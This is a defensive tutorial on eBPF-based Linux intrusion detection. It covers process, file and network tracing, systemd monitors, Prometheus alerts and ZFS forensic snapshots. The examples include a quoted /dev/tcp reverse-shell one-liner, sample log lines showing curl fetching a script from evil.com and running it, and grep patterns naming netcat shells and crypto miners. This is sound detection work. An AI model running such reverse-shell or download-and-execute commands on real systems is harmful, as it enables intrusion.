eBPF for Security — Intrusion Detection Without Agents
Agent-based endpoint detection (EDR) means installing a vendor daemon that hoovers up RAM, phones home to a cloud, and breaks on every kernel update. eBPF gives you the same visibility — process execution, file integrity, network connections — directly from the kernel, with no resident vendor agent and no cloud dependency (just bcc or bpftrace on the box). The kernel is the sensor.
The premise: every security-relevant event on a Linux box passes through the kernel. Processes call execve. Files get opened. Sockets get connected. eBPF lets you tap those events at the source — before any userspace tool can hide them. No agent to kill. No log to truncate. The kernel sees everything.
Why this beats agent-based EDR
Traditional EDR agents run in userspace. A rootkit with root access can kill the agent, hide its processes from ps, and delete its logs. eBPF programs run inside the kernel — they see the raw syscalls before userspace even knows they happened. An attacker with root can still kill the userspace tracer that attached the probes, but that kill is itself a syscall the monitor logs first; evading eBPF cleanly means tampering with the kernel, not just userspace.
execsnoop — process execution monitor
Every time a process calls execve — launching a binary — execsnoop logs it. This catches reverse shells, crypto miners, privilege escalation tools, and any unauthorized binary the moment it runs.
# Watch every process launch system-wide, with timestamps
execsnoop -T
Output:
TIME PCOMM PID PPID RET ARGS
14:23:01 bash 4521 4519 0 /bin/bash -i
14:23:01 curl 4522 4521 0 /usr/bin/curl http://evil.com/shell.sh
14:23:02 bash 4523 4521 0 /bin/bash /tmp/shell.sh
That three-line sequence — bash spawning curl to fetch a script, then executing it — is a textbook reverse shell download-and-execute. execsnoop caught every step.
Detect specific threats
# Log only processes launched from /tmp or /dev/shm (common attack staging dirs)
# (--line-buffered keeps the output real-time when piped onward)
execsnoop -T 2>&1 | grep --line-buffered -E '/tmp/|/dev/shm/'
# Catch crypto miners by watching for common miner binary names
execsnoop -T 2>&1 | grep --line-buffered -iE 'xmrig|minerd|cpuminer|stratum'
# Watch for reverse shell patterns
execsnoop -T 2>&1 | grep --line-buffered -E 'bash -i|nc -e|ncat -e|python.*socket|perl.*socket'
What you're catching
Crypto miners: almost always land in /tmp, get executed by a web shell or cron job, and call themselves something like kworker or kthreadd to blend in. execsnoop sees the real binary path.
Reverse shells: bash -i >& /dev/tcp/ATTACKER/PORT 0>&1 is the classic. It still calls execve for bash. execsnoop logs it.
Lateral movement: SSH from a compromised host spawns sshd then a shell. execsnoop logs the full chain with parent PIDs.
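Those parent PIDs are enough to reconstruct an attack chain after the fact. A hypothetical helper, sketched against the column layout shown above (the `chain` name and log path are illustrative):

```shell
# Hypothetical helper: given a captured execsnoop log on stdin and a PID,
# walk the recorded PPID links and print the exec ancestry chain.
# Assumes the column layout shown above: TIME PCOMM PID PPID RET ARGS
chain() {
  awk -v target="$1" '
    NR > 1 { parent[$3] = $4; cmd[$3] = $2 }   # index every exec by PID
    END {
      pid = target
      while (pid in cmd) {
        printf "%s(%s)", cmd[pid], pid
        pid = parent[pid]
        if (pid in cmd) printf " <- "
      }
      print ""
    }'
}
# Usage: chain 4523 < /var/log/ebpf-execsnoop.log
```

Run against the reverse-shell example above, `chain 4523` prints the bash-spawned-bash lineage in one line.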
opensnoop — file integrity monitoring
opensnoop traces every open() and openat() syscall. Point it at your sensitive files and you have real-time file integrity monitoring — no AIDE database, no inotify limits, no polling interval.
# Watch accesses to critical auth files. bcc's opensnoop filters by PID,
# comm, or open flags — not by filename — so grep the stream instead
opensnoop -T | grep -E '/etc/passwd|/etc/shadow|/etc/ssh/sshd_config'
Or trace everything at once with bpftrace:
bpftrace -e '
tracepoint:syscalls:sys_enter_openat
/str(args.filename) == "/etc/passwd" ||
str(args.filename) == "/etc/shadow" ||
str(args.filename) == "/etc/sudoers" ||
str(args.filename) == "/root/.ssh/authorized_keys"/
{
time("%H:%M:%S ");
printf("pid=%d comm=%s file=%s\n", pid, comm, str(args.filename));
}'
Output:
14:31:07 pid=8821 comm=vi file=/etc/shadow
14:31:12 pid=8830 comm=python3 file=/root/.ssh/authorized_keys
Someone editing /etc/shadow with vi might be legitimate. Python3 touching authorized_keys is almost certainly an attacker adding their SSH key. The combination of process name + file path + timestamp tells the story.
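One way to keep that signal reviewable is an allowlist filter over the bpftrace output. A sketch — the trusted process names here are examples only; tune them to your own baseline:

```shell
# Sketch: drop lines from known-legitimate processes; everything left
# is worth a human look. The comm allowlist below is illustrative.
triage() {
  grep -Ev 'comm=(sshd|sudo|passwd|login|vipw) '
}
# Usage: bpftrace sensfiles.bt | triage
```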
Watch for SSH key injection
# Trace any process opening any authorized_keys file. bpftrace string
# equality cannot glob across /home/*, so match the path suffix instead
# (strcontains needs a recent bpftrace; on older versions, grep the output)
bpftrace -e '
tracepoint:syscalls:sys_enter_openat
/strcontains(str(args.filename), ".ssh/authorized_keys")/
{
time("%H:%M:%S ");
printf("ALERT: %s (pid=%d) opened %s flags=%d\n",
comm, pid, str(args.filename), args.flags);
}'
tcpconnect + tcplife — network intrusion detection
Every outbound TCP connection passes through the kernel's tcp_v4_connect path. tcpconnect and tcplife give you a complete picture of who is talking to whom, for how long, and how much data moved.
# Watch all outbound TCP connections with the process that made them
tcpconnect -T
Output:
TIME PID COMM IP SADDR DADDR DPORT
14:45:01 3312 curl 4 10.0.0.5 185.143.223.1 443
14:45:03 3315 python3 4 10.0.0.5 45.33.32.156 4444
14:45:05 8821 sshd 4 10.0.0.5 10.0.0.12 22
Line two is the problem. Python3 connecting outbound to port 4444 is a classic C2 (command and control) callback. tcpconnect caught the process name, PID, and destination in real time.
Detect C2 callbacks and lateral movement
# Flag connections to non-standard ports (not 80, 443, 22, 53)
tcpconnect -T 2>&1 | awk '$NF !~ /^(80|443|22|53)$/ {print "SUSPICIOUS:", $0}'
# Watch for lateral movement (internal-to-internal SSH)
tcpconnect -T 2>&1 | awk '$NF == 22 && $6 ~ /^(10\.|172\.(1[6-9]|2[0-9]|3[01])\.|192\.168\.)/ {print "LATERAL:", $0}'
Session analysis with tcplife
# Show completed TCP sessions with duration and bytes transferred
tcplife -T
Output:
TIME PID COMM IP LADDR LPORT RADDR RPORT TX_KB RX_KB MS
14:50:01 3315 python3 4 10.0.0.5 49221 45.33.32.156 4444 0 847 30042
A 30-second connection to port 4444 that received 847 KB of data. That is a C2 session downloading a payload. tcplife gives you duration, bytes, and process — everything you need to write the incident report.
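That triage can be automated. A sketch that flags completed sessions combining an odd port with a nontrivial byte count — the 500 KB threshold is an example, and the column positions follow the tcplife -T output above:

```shell
# Sketch: flag sessions to non-standard ports that moved > 500 KB total.
# Columns (with -T): TIME PID COMM IP LADDR LPORT RADDR RPORT TX_KB RX_KB MS
flag_sessions() {
  awk 'NR > 1 && $8 !~ /^(80|443|22|53)$/ && ($9 + $10) > 500 {
         print "FLAG:", $3, $7 ":" $8, ($9 + $10) " KB"
       }'
}
# Usage: tcplife -T | flag_sessions
```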
Network detection without packet capture
Traditional network IDS (Snort, Suricata) inspects packets, which means decrypting TLS or missing encrypted traffic entirely. eBPF works at the socket layer — it sees the process making the connection, the destination, and the byte counts regardless of encryption. You cannot encrypt away from the kernel.
Building persistent eBPF monitors with systemd
One-off tracing is useful for investigation. Persistent monitoring catches threats while you sleep. Wrap any eBPF tool in a systemd service and it runs continuously (adjust the ExecStart paths below to wherever your distro installs the bcc tools).
cat > /etc/systemd/system/ebpf-execmonitor.service << 'EOF'
[Unit]
Description=eBPF process execution monitor
After=network.target
[Service]
Type=simple
ExecStart=/usr/sbin/execsnoop -T
StandardOutput=append:/var/log/ebpf-execsnoop.log
StandardError=append:/var/log/ebpf-execsnoop.err
Restart=always
RestartSec=5
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable --now ebpf-execmonitor
cat > /etc/systemd/system/ebpf-netmonitor.service << 'EOF'
[Unit]
Description=eBPF network connection monitor
After=network.target
[Service]
Type=simple
ExecStart=/usr/sbin/tcpconnect -T
StandardOutput=append:/var/log/ebpf-tcpconnect.log
StandardError=append:/var/log/ebpf-tcpconnect.err
Restart=always
RestartSec=5
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable --now ebpf-netmonitor
Now every process launch and every TCP connection is logged to files under /var/log/. These survive reboots and give you a forensic timeline.
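Building a timeline from those files is then just text processing — for example, merging both logs for one minute of interest (the timestamp and paths in the usage line are illustrative; both tools prefix lines with HH:MM:SS):

```shell
# Sketch: merge exec and connection events for a time window into a
# single chronological view
timeline() {
  prefix="$1"; shift
  grep -h "^${prefix}" "$@" | sort
}
# Usage: timeline 14:23 /var/log/ebpf-execsnoop.log /var/log/ebpf-tcpconnect.log
```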
Log rotation
cat > /etc/logrotate.d/ebpf-monitors << 'EOF'
/var/log/ebpf-*.log {
daily
rotate 30
compress
missingok
notifempty
copytruncate
}
EOF
Alerting: eBPF to syslog to Prometheus to your inbox
Logging is step one. Alerting is step two. Pipe eBPF output through syslog, expose metrics to Prometheus, and fire alerts through Alertmanager.
Step 1: Send eBPF output to syslog
# Modify the systemd service to pipe through logger, which turns each
# line of execsnoop output into its own syslog message
cat > /etc/systemd/system/ebpf-execalert.service << 'EOF'
[Unit]
Description=eBPF exec monitor with syslog alerting
After=network.target
[Service]
Type=simple
ExecStart=/bin/bash -c '/usr/sbin/execsnoop -T | logger -t ebpf-exec -p local0.info'
Restart=always
RestartSec=5
[Install]
WantedBy=multi-user.target
EOF
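If you run rsyslog, a small drop-in can route the tagged messages to their own file. A sketch, assuming rsyslog's legacy property-based filter syntax — the filename and tag are examples, adjust to your setup:

```shell
# Hypothetical rsyslog drop-in: send ebpf-exec-tagged messages to a
# dedicated file and stop further processing of those lines
cat > /etc/rsyslog.d/30-ebpf.conf << 'EOF'
:syslogtag, startswith, "ebpf-exec" /var/log/ebpf-alerts.log
& stop
EOF
systemctl restart rsyslog
```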
Step 2: Write a Prometheus exporter (minimal)
cat > /usr/local/bin/ebpf-metrics.sh << 'SCRIPT'
#!/bin/bash
# Expose eBPF event counts as Prometheus metrics
# Run from cron every minute; write to the node_exporter textfile dir
TEXTFILE_DIR="/var/lib/node_exporter/textfile_collector"
mkdir -p "$TEXTFILE_DIR"
EXEC_COUNT=$(wc -l < /var/log/ebpf-execsnoop.log 2>/dev/null || echo 0)
TCP_COUNT=$(wc -l < /var/log/ebpf-tcpconnect.log 2>/dev/null || echo 0)
# grep -c prints 0 but exits non-zero on no match, so avoid "|| echo 0" here
SUSPICIOUS=$(grep -cE '/tmp/|/dev/shm/' /var/log/ebpf-execsnoop.log 2>/dev/null)
SUSPICIOUS=${SUSPICIOUS:-0}
cat > "$TEXTFILE_DIR/ebpf.prom" << EOF
# HELP ebpf_exec_total Total process executions observed
# TYPE ebpf_exec_total counter
ebpf_exec_total $EXEC_COUNT
# HELP ebpf_tcp_connections_total Total TCP connections observed
# TYPE ebpf_tcp_connections_total counter
ebpf_tcp_connections_total $TCP_COUNT
# HELP ebpf_suspicious_exec_total Processes launched from suspicious paths
# TYPE ebpf_suspicious_exec_total counter
ebpf_suspicious_exec_total $SUSPICIOUS
EOF
SCRIPT
chmod +x /usr/local/bin/ebpf-metrics.sh
Step 3: Alertmanager rule
# In your Prometheus alerting rules:
cat > /etc/prometheus/rules/ebpf-alerts.yml << 'EOF'
groups:
  - name: ebpf_security
    rules:
      - alert: SuspiciousProcessExecution
        expr: rate(ebpf_suspicious_exec_total[5m]) > 0
        for: 1m
        labels:
          severity: critical
        annotations:
          summary: "Process launched from /tmp or /dev/shm"
          description: "eBPF observed a suspicious-execution rate of {{ $value }}/s over the last 5 minutes"
      - alert: UnusualOutboundConnections
        expr: rate(ebpf_tcp_connections_total[5m]) > 100
        for: 5m
        labels:
          severity: warning
        annotations:
          summary: "Unusual outbound connection rate"
          description: "{{ $value }} TCP connections/sec observed"
EOF
The full pipeline
eBPF (kernel) catches the event. Systemd keeps the monitor running. Syslog provides centralized logging. Prometheus scrapes the metrics. Alertmanager fires the notification. You get an email or Slack message. The entire chain is open source, runs on your hardware, and no data leaves your network.
bpftrace one-liners for security
Trace setuid calls (privilege escalation)
bpftrace -e '
tracepoint:syscalls:sys_enter_setuid {
time("%H:%M:%S ");
printf("setuid(%d) by %s (pid=%d)\n", args.uid, comm, pid);
}'
Watch for new SUID binaries appearing
# glibc routes chmod() through the fchmodat syscall on modern systems,
# so trace both entry points (plus fchmod for fd-based changes)
bpftrace -e '
tracepoint:syscalls:sys_enter_chmod,
tracepoint:syscalls:sys_enter_fchmodat
/args.mode & 04000/
{
time("%H:%M:%S ");
printf("SUID SET: %s set mode %o on %s (pid=%d)\n",
comm, args.mode, str(args.filename), pid);
}
tracepoint:syscalls:sys_enter_fchmod
/args.mode & 04000/
{
time("%H:%M:%S ");
printf("SUID SET: %s set mode %o via fchmod (pid=%d)\n",
comm, args.mode, pid);
}'
If anything sets the SUID bit on a binary, this fires immediately. Attackers use SUID binaries for persistence — a SUID root shell in /tmp survives even if their initial access is killed.
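The live trace pairs well with a point-in-time baseline taken with standard find flags, so an alert can be checked against a known-good list. A sketch — the baseline path is an example:

```shell
# Sketch: record all current SUID binaries under a root of interest,
# then diff later scans against that baseline to surface additions
suid_scan() { find "$1" -xdev -perm -4000 -type f 2>/dev/null | sort; }

# Take the baseline once (scan / in production; path is an example):
#   suid_scan / > /var/lib/suid-baseline.txt
# Later, print only binaries that were not in the baseline:
#   suid_scan / | comm -13 /var/lib/suid-baseline.txt -
```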
Detect container escapes (namespace changes)
bpftrace -e '
tracepoint:syscalls:sys_enter_setns {
time("%H:%M:%S ");
// the kernel names the second setns() argument "flags"
printf("NAMESPACE CHANGE: %s (pid=%d) setns fd=%d nstype=%d\n",
comm, pid, args.fd, args.flags);
}
tracepoint:syscalls:sys_enter_unshare {
time("%H:%M:%S ");
printf("UNSHARE: %s (pid=%d) flags=%d\n",
comm, pid, args.unshare_flags);
}'
Container escapes typically involve calling setns() to join the host's namespaces or unshare() to create new ones. This catches both patterns. Legitimate container runtimes (runc, containerd) also trigger this — so baseline your normal activity first, then alert on anomalies.
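Baselining can be as simple as counting events per process name in a day of captured output. A sketch against the print format used above (the log path in the usage line is illustrative):

```shell
# Sketch: tally setns/unshare events per comm from the monitor's output;
# anything outside the usual runtimes (runc, containerd, systemd) stands out
baseline_comms() {
  grep -oE '(NAMESPACE CHANGE|UNSHARE): [^ ]+' | awk '{ print $NF }' \
    | sort | uniq -c | sort -rn
}
# Usage: baseline_comms < /var/log/ns-monitor.log
```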
Trace all kernel module loads
bpftrace -e '
kprobe:do_init_module {
time("%H:%M:%S ");
printf("MODULE LOADED by %s (pid=%d uid=%d)\n", comm, pid, uid);
}'
Rootkits load kernel modules. On a stable production system, module loads should be rare and expected. Any surprise module load after boot is worth investigating.
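As with SUID bits, a baseline complements the live trace. A sketch reading /proc/modules directly — the file argument is parameterized only to make it easy to test, and the baseline path is an example:

```shell
# Sketch: snapshot loaded module names at boot, then diff to catch
# anything loaded afterwards
mod_list() { awk '{ print $1 }' "${1:-/proc/modules}" | sort; }

# At boot:
#   mod_list > /var/lib/modules-baseline.txt
# Later, print only modules that appeared since:
#   mod_list | comm -13 /var/lib/modules-baseline.txt -
```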
Real example: log every process that opens a network socket
This bpftrace script creates a comprehensive log of every process that creates a network socket, including the socket type and protocol family.
#!/usr/bin/env bpftrace
/*
* socketwatch.bt - Log every network socket creation
* Run: bpftrace socketwatch.bt
*/
tracepoint:syscalls:sys_enter_socket
{
$family = args.family;
$type = args.type & 0xf; /* mask out SOCK_NONBLOCK/SOCK_CLOEXEC flags */
/* Only care about network sockets: AF_INET=2, AF_INET6=10 */
if ($family == 2 || $family == 10) {
time("%H:%M:%S ");
printf("pid=%-6d comm=%-16s family=%-5s type=%-7s\n",
pid, comm,
$family == 2 ? "IPv4" : "IPv6",
$type == 1 ? "STREAM" :
$type == 2 ? "DGRAM" :
$type == 3 ? "RAW" : "OTHER");
}
}
Output:
14:55:01 pid=3312 comm=curl family=IPv4 type=STREAM
14:55:02 pid=8821 comm=sshd family=IPv4 type=STREAM
14:55:03 pid=3315 comm=python3 family=IPv4 type=STREAM
14:55:05 pid=9901 comm=nmap family=IPv4 type=RAW
That last line — nmap opening a RAW socket — is a classic port-scanning signature. On a production server, RAW sockets outside of known monitoring tools almost always warrant investigation.
Real example: watch for new SUID binaries
This script continuously monitors the filesystem for any chmod/fchmodat calls that set the SUID or SGID bit. Save it as a persistent service for ongoing protection.
#!/usr/bin/env bpftrace
/*
* suidwatch.bt - Alert on any SUID/SGID bit being set
* Run: bpftrace suidwatch.bt | logger -t suid-watch -p auth.alert
*/
tracepoint:syscalls:sys_enter_fchmodat
/args.mode & 06000/
{
time("%H:%M:%S ");
printf("ALERT SUID/SGID SET: comm=%s pid=%d uid=%d mode=%o file=%s\n",
comm, pid, uid, args.mode, str(args.filename));
}
tracepoint:syscalls:sys_enter_chmod
/args.mode & 06000/
{
time("%H:%M:%S ");
printf("ALERT SUID/SGID SET: comm=%s pid=%d uid=%d mode=%o file=%s\n",
comm, pid, uid, args.mode, str(args.filename));
}
Deploy it as a systemd service (save the script above to /usr/local/share/bpftrace/suidwatch.bt, the path the unit references):
cat > /etc/systemd/system/suid-watch.service << 'EOF'
[Unit]
Description=eBPF SUID binary monitor
After=network.target
[Service]
Type=simple
ExecStart=/bin/bash -c 'bpftrace /usr/local/share/bpftrace/suidwatch.bt | logger -t suid-watch -p auth.alert'
Restart=always
RestartSec=5
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable --now suid-watch
Forensic snapshots: ksnap when eBPF detects anomaly
On Linux systems running ZFS (OpenZFS), you can automatically take a snapshot when eBPF detects something suspicious. This preserves the exact state of the filesystem at the moment of the incident — before the attacker can clean up.
cat > /usr/local/bin/ebpf-forensic-snap.sh << 'SCRIPT'
#!/bin/bash
# Called by eBPF alerting pipeline when suspicious activity is detected
# Usage: ebpf-forensic-snap.sh "reason string"
REASON="${1:-unknown}"
TIMESTAMP=$(date +%Y%m%d-%H%M%S)
POOL=$(zpool list -H -o name | head -1)
if [ -n "$POOL" ]; then
SNAPNAME="${POOL}@forensic-${TIMESTAMP}"
zfs snapshot -r "$SNAPNAME"
logger -t ebpf-forensic -p auth.crit \
"Forensic snapshot created: $SNAPNAME reason: $REASON"
echo "Snapshot: $SNAPNAME"
fi
SCRIPT
chmod +x /usr/local/bin/ebpf-forensic-snap.sh
Wire it into your exec monitor:
# Modified execsnoop pipeline that triggers forensic snapshots
cat > /usr/local/bin/ebpf-exec-alert.sh << 'SCRIPT'
#!/bin/bash
execsnoop -T | while IFS= read -r line; do
echo "$line" >> /var/log/ebpf-execsnoop.log
# Check for suspicious patterns
if echo "$line" | grep -qE '/tmp/|/dev/shm/|bash -i|nc -e|ncat'; then
echo "ALERT: $line" | logger -t ebpf-exec -p auth.alert
/usr/local/bin/ebpf-forensic-snap.sh "suspicious exec: $line"
fi
done
SCRIPT
chmod +x /usr/local/bin/ebpf-exec-alert.sh
ZFS + eBPF = forensic gold
ZFS snapshots are instant, atomic, and consume zero space until data changes. When eBPF detects an anomaly, snapshotting the entire pool takes milliseconds. Now you have a forensic copy of every file, every log, every binary — exactly as it existed at the moment of detection. The attacker can wipe logs and delete their tools, but the snapshot preserves the evidence.
This replaces agent-based EDR
Here is what you get with eBPF vs. a commercial EDR agent:
| Capability | Commercial EDR | eBPF on Linux |
|---|---|---|
| Process execution monitoring | Yes (agent) | Yes (execsnoop) |
| File integrity monitoring | Yes (agent) | Yes (opensnoop + bpftrace) |
| Network connection tracking | Yes (agent) | Yes (tcpconnect + tcplife) |
| Privilege escalation detection | Yes (agent) | Yes (setuid/setns tracing) |
| Forensic snapshots | No | Yes (ZFS snapshots) |
| Works offline | Partially | Fully |
| Data leaves your network | Yes (cloud telemetry) | No |
| Kernel module required | Often yes | No (in-kernel VM) |
| RAM overhead | 200-500 MB | ~2 MB per probe |
| Survives agent kill | No | Yes (kernel-level) |
| Annual cost | Per-endpoint licensing | Free (native kernel tools) |
You are not giving up anything by dropping the agent. You are gaining visibility, losing overhead, and keeping your data on your hardware.